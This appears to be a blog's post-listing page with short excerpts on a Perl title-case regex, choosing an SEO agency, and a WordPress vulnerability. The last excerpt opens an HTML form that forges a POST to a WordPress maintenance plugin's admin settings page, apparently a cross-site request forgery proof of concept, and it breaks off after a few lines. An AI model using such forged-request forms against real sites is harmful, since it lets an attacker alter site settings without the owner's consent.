Dec 20, 2019 | Regex, Code Example
You feed in a string to a regular expression and it comes out in Title Case. As Perl, PHP and ASP use regular expressions, this expression is useful with a little tinkering: $x =~ s/(\w+)/\u\L$1/g; $x =~ s/(\sand|of\s)/\L$1/ig if ($x =~ /\sand|of\s/i);...
Dec 19, 2019 | Uncategorized
The task of picking the right SEO agency is difficult. There are so many of them. It’s the Wild West. When you give them your credit card, are they buying AdWords for your business or for themselves? A good SEO agency will never have a problem sharing all of...
Nov 28, 2019 | WordPress Vulnerabilities
<html> <body> <form action=”http://URL/wp-admin/admin.php?page=wp-maintenance” method=”POST”> <input type=”hidden” name=”action” value=”update_general” /> <input...